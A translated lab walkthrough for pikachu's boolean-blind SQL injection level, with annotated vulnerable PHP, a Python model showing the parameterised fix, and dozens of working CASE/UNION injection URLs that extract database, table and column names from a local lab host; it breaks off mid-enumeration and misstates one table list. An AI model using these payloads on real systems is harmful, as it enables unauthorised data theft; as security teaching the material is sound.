Contents
I. SQL injection
II. Boolean-based blind injection
III. Source code analysis
IV. Penetration practice
1. SQL injection detection
(1) Entering an existing account
(2) Entering a non-existent account
(3) Entering a single quote and other inputs that may trigger an error
2. Manual injection
(1) Probing the database name
(2) Probing table names
(3) Probing column names
(4) Probing data
3. sqlmap
This series is a collection of walkthroughs for the SQL injection levels (10 in total) of the pikachu lab, based on 《pikachu靶场通关笔记》 (the pikachu lab walkthrough notes). By auditing the source code of the boolean-based blind injection level (base on boolian) we locate the real cause of the SQL injection risk, explain the principle of boolean-based blind injection and put it into practice. This article is the penetration part of SQL injection level 09, boolean-based blind injection (base on boolian).
I. SQL injection
SQL injection arises mainly because, when front-end data is handed to the back end to build SQL statements, no strict validation is performed: the submitted "data" is concatenated into the SQL statement and then executed as part of it. The outcome is damage to the database (data dumped, data deleted, or even the whole server compromised).
II. Boolean-based blind injection
Boolean-based blind injection is a SQL injection technique used when the application, after running a SQL query, returns only two distinguishable outcomes (the page renders normally or abnormally, or returns "true" or "false") and never exposes detailed database errors or query results. An attacker can exploit this by submitting a series of boolean conditions and inferring information about the database from the application's response, gradually recovering sensitive content.
The core idea is to use boolean expressions inside the SQL statement as conditional tests. The attacker keeps constructing different conditions and observes the response (page state, returned content, etc.) to learn whether each condition holds, and in this way recovers the database name, table names, column names and finally the data itself.
The steps of a boolean-based blind injection are summarised in the table below.
| Step | Action |
|---|---|
| Identify the injection point | Submit special characters (such as a single quote ') and observe the response; if the page behaves abnormally (error, unexpected message, etc.) an injection point may exist |
| Determine the database name length | Build a boolean condition and try different length values; the response (normal display means the condition holds, abnormal display means it does not) reveals the length of the database name |
| Recover the database name character by character | Use SUBSTRING to extract one character and ASCII to convert it to its code; try different ASCII values and decide the character at that position from the response |
| Get the table name length | Read the table name length from information_schema, build a boolean condition and try different lengths to determine the length of the first table name |
| Recover the table name character by character | As for the database name, extract the table name from information_schema one character at a time |
| Get column names and data | Repeat the character-by-character method to read column names from information_schema and then the data itself |
III. Source code analysis
Open the source file sqli_blind_b.php of the pikachu SQL injection boolean-blind level, shown below.
This PHP code implements a simple user-information lookup. When the user submits a form via GET containing a submit parameter and a name parameter, the code concatenates the value of name directly into the SQL query and selects the id and email of the record in the member table whose username equals that value. If exactly one record is found, its id and email are displayed as an HTML paragraph; if none is found, the user is told that the username does not exist. The annotated code follows.
```php
<?php
// Call connect() to open the database connection and keep the handle in $link
$link = connect();
// Initialise the variable that accumulates the HTML shown to the user (result or notice)
$html = '';
// Check that the form was submitted via GET and that the 'name' field is not empty
if (isset($_GET['submit']) && $_GET['name'] != null) {
    // Take the 'name' parameter from the GET request as-is, with no processing at all
    $name = $_GET['name'];
    // Build the SQL statement that selects id and email of the member row whose username equals the input.
    // Because 'name' is a string it is wrapped in single quotes in the SQL text; this is where the injection risk lies
    $query = "select id,email from member where username='$name'";
    // Execute the statement with mysqli_query.
    // mysqli_query does not print a detailed error description, so an injection is harder to spot even when it exists
    $result = mysqli_query($link, $query);
    // Check that the result set is valid and contains exactly one row
    if ($result && mysqli_num_rows($result) == 1) {
        // With exactly one record, fetch it row by row with a while loop
        while ($data = mysqli_fetch_assoc($result)) {
            // Read the 'id' field from the associative array $data
            $id = $data['id'];
            // Read the 'email' field from the associative array $data
            $email = $data['email'];
            // Append the user information to $html as an HTML paragraph
            $html .= "<p class='notice'>your uid:{$id} <br />your email is: {$email}</p>";
        }
    } else {
        // No record, or the query failed: append the error notice to $html instead
        $html .= "<p class='notice'>您输入的 username 不存在,请重新输入!</p>";
    }
}
?>
```
The code carries a boolean-based SQL injection risk, and the key point is that the name parameter submitted via GET is not processed at all. $_GET['name'] is concatenated straight into the SQL query without any validation or filtering. An attacker can craft input that changes the logic of the SQL statement and, by telling apart the two notices the page returns (record found versus record not found), gradually extract sensitive information from the database.
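To show why the string concatenation in sqli_blind_b.php turns the page into a yes/no oracle, and why binding the value as a parameter closes it, here is an added example (not code from pikachu) that models the PHP logic in Python on an in-memory sqlite3 database with constructed sample rows. Because sqlite does not reject a multi-row scalar subquery the way MySQL does, the probe uses a plain LENGTH() comparison instead of the CASE ... UNION form used later in this walkthrough.

```python
"""Python/sqlite3 model of the lookup in sqli_blind_b.php (added example, not the
project's code): the string-concatenated query beside a parameterised one."""
import sqlite3

NOT_FOUND = "您输入的 username 不存在,请重新输入!"


def make_db() -> sqlite3.Connection:
    # Constructed sample rows standing in for pikachu's member and users tables.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE member (id INTEGER, username TEXT, email TEXT);
        INSERT INTO member VALUES (1, 'lili', 'lili@pikachu.com');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT, level INTEGER);
        INSERT INTO users VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e', 1);
    """)
    return conn


def render(rows) -> str:
    # Same branching as the PHP: exactly one row -> show it, anything else -> NOT_FOUND.
    if len(rows) == 1:
        uid, email = rows[0]
        return f"your uid:{uid} your email is: {email}"
    return NOT_FOUND


def lookup_vulnerable(conn, name: str) -> str:
    # Mirrors $query = "select id,email from member where username='$name'";
    query = f"select id,email from member where username='{name}'"
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error:
        rows = []  # a failed query (mysqli_query() === false) takes the else branch too
    return render(rows)


def lookup_fixed(conn, name: str) -> str:
    # The value is bound as data: no part of it is ever parsed as SQL, so an injected
    # condition is simply a username that does not exist.
    rows = conn.execute("select id,email from member where username=?", (name,)).fetchall()
    return render(rows)


def injected(condition: str) -> str:
    # The payload shape used throughout this walkthrough: close the quote, AND in a
    # condition, and comment out the trailing quote (the page's "--+" decodes to "-- ").
    return f"lili' AND ({condition})-- "


def leaks_bit(lookup) -> bool:
    """True if the response differs between a true and a false injected condition,
    i.e. the endpoint behaves as a boolean oracle."""
    conn = make_db()
    yes = lookup(conn, injected("LENGTH((SELECT username FROM users LIMIT 1)) = 5"))
    no = lookup(conn, injected("LENGTH((SELECT username FROM users LIMIT 1)) = 6"))
    return yes != no


if __name__ == "__main__":
    print("concatenated query is an oracle:", leaks_bit(lookup_vulnerable))  # True
    print("parameterised query is an oracle:", leaks_bit(lookup_fixed))      # False
```

In the PHP original the same fix is a prepared statement (mysqli_prepare with mysqli_stmt_bind_param), with $name bound as a parameter instead of interpolated into the query string.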
IV. Penetration practice
1. SQL injection detection
(1) Entering an existing account
As shown below, when an existing account is entered, the account's id and email address are displayed.
(2) Entering a non-existent account
When a non-existent account is entered, taking "mooyuan---" as the input, the page shows the notice "您输入的username不存在,请重新输入" (the username you entered does not exist, please try again), as shown below.
(3) Entering a single quote and other inputs that may trigger an error
When a single quote is entered, a case that in level 02 and others produced a SQL error message, this level shows no error at all, only the same notice "您输入的username不存在,请重新输入", as shown below.
For comparison, the same single-quote input in level 2 (character type) does produce an error, as shown below.
2. Manual injection
(1) Probing the database name
As shown below, the database name has length 7 and is pikachu. Every request appends a condition of the form AND (CASE WHEN (condition) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END): when the condition holds the CASE evaluates to 1 and lili's record is returned; when it fails, the ELSE branch yields two rows where a single value is expected, MySQL rejects the whole query, mysqli_query returns false and the page falls into the "username does not exist" branch.
[+] 第一步:探测数据库名
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH(DATABASE()) = 7) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
数据库名长度:7
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 1, 1) = 'p') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 2, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 3, 1) = 'k') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 4, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 5, 1) = 'c') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 6, 1) = 'h') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING(DATABASE(), 7, 1) = 'u') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
数据库名:pikachu
(2) Probing table names
As shown below, the pikachu database has 5 tables: emails, httpinfo, member, users and xss_blind.
[+] 第二步:探测表信息
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN ((SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu') > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN ((SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu') = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
表数量:5
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 1, 1) = 'h') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 2, 1) = 't') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 3, 1) = 't') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 4, 1) = 'p') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 5, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 6, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 7, 1) = 'f') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 0,1), 8, 1) = 'o') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
表 1: httpinfo
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1)) = 6) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 6
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 1, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 2, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 3, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 4, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 5, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 1,1), 6, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
表 2: member
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1)) > 6) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1)) = 7) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 7
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 1, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 2, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 3, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 4, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 5, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 6, 1) = 'g') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 2,1), 7, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
表 3: message
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1)) = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 5
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 1, 1) = 'u') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 2, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 3, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 4, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 3,1), 5, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
表 4: users
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 表名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 1, 1) = 'x') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 2, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 3, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 4, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 5, 1) = 'l') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 6, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 7, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='pikachu' LIMIT 4,1), 8, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
表 5: xssblind
(3) Probing column names
As shown below, the users table has four columns: id, username, password and level.
[+] 第三步:探测表 users 的列
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN ((SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users') = 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
列数量:4
[*] 正在探测表 users 的第 1 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 0,1)) = 2) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 2
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 0,1), 1, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 0,1), 2, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名: id
列 1: id
[*] 正在探测表 users 的第 2 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 1, 1) = 'u') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 2, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 3, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 4, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 5, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 6, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 7, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 1,1), 8, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名: username
列 2: username
[*] 正在探测表 users 的第 3 列名...
